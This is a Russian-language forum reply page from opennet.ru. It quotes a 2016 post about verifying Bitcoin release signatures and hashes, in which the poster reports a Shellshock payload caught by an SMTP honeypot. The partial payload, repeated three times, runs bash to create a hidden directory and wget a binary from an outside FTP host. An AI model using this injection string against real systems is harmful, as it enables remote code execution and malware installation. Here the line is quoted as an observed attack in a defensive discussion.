forum.opennet.ru

Составление сообщения

Исходное сообщение

"Серия уязвимостей в продуктах Cisco, выявленных после публик..."
Отправлено PnDx, 22-Авг-16 18:15

>  sha1sum
>  d215d582aec707d2dc208b61d4442def8e08268b  bitcoin-0.12.1-linux32.tar.gz
>  156b897c6c7d1f12587d72ea92ccaf28dccedd55  bitcoin-0.12.1-linux64.tar.gz
? Не поленился сходить на официалку, там подписанные sha256. Т.е. врукопашную качаем asc → проверяем подпись → качаем .tar.gz → проверяем сумму.
Наличие поддерживаемого репо сводит эти шаги к исходной проверке сигнатуры репозитория.
В описанном выше случае с высокой долей вероятности был применён виндо-подход "скачал-запустил", возможно даже из-под рута (т.к. логи "вдруг" не исчезают).
** Тут ко мне в "ловушку" прилетело по smtp:
To:() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;…
ну и т.д., в конце хамство с затиркой всего подряд.  Таки не понял, это что за почтовик шелл из-под рута дёргает? Судя по наличию робота, явление сравнительно массовое?

Исходное сообщение
"Серия уязвимостей в продуктах Cisco, выявленных после публик..." Отправлено PnDx, 22-Авг-16 18:15
> sha1sum > d215d582aec707d2dc208b61d4442def8e08268b bitcoin-0.12.1-linux32.tar.gz > 156b897c6c7d1f12587d72ea92ccaf28dccedd55 bitcoin-0.12.1-linux64.tar.gz ? Не поленился сходить на официалку, там подписанные sha256. Т.е. врукопашную качаем asc → проверяем подпись → качаем .tar.gz → проверяем сумму. Наличие поддерживаемого репо сводит эти шаги к исходной проверке сигнатуры репозитория. В описанном выше случае с высокой долей вероятности был применён виндо-подход "скачал-запустил", возможно даже из-под рута (т.к. логи "вдруг" не исчезают). ** Тут ко мне в "ловушку" прилетело по smtp: To:() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;… ну и т.д., в конце хамство с затиркой всего подряд. Таки не понял, это что за почтовик шелл из-под рута дёргает? Судя по наличию робота, явление сравнительно массовое?

Ваше сообщение
Имя*:
EMail:	Для отправки ответов на email укажите знак ! перед адресом, например, !user@host.ru (!! - не показывать email). Более тонкая настройка отправки ответов производится в профиле зарегистрированного участника форума.
Заголовок*:
Сообщение*:	>> sha1sum >> d215d582aec707d2dc208b61d4442def8e08268b bitcoin-0.12.1-linux32.tar.gz >> 156b897c6c7d1f12587d72ea92ccaf28dccedd55 bitcoin-0.12.1-linux64.tar.gz > ? Не поленился сходить на официалку, там подписанные sha256. Т.е. врукопашную качаем > asc → проверяем подпись → качаем .tar.gz → проверяем сумму. > Наличие поддерживаемого репо сводит эти шаги к исходной проверке сигнатуры репозитория. > В описанном выше случае с высокой долей вероятности был применён виндо-подход "скачал-запустил", > возможно даже из-под рута (т.к. логи "вдруг" не исчезают). > ** Тут ко мне в "ловушку" прилетело по smtp: > To:() { :; }; /bin/bash -c "mkdir /var/.udp; wget ftp://ftp.ugotownedz.org/Xorg -O /var/.udp/Xorg;… > ну и т.д., в конце хамство с затиркой всего подряд. Таки > не понял, это что за почтовик шелл из-под рута дёргает? Судя > по наличию робота, явление сравнительно массовое?
	Введите код, изображенный на картинке:

При общении не допускается: неуважительное отношение к собеседнику, хамство, унизительное обращение, ненормативная лексика, переход на личности, агрессивное поведение, обесценивание собеседника, провоцирование флейма голословными и заведомо ложными заявлениями. Не отвечайте на сообщения, явно нарушающие правила - удаляются не только сами нарушения, но и все ответы на них. Лог модерирования.

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру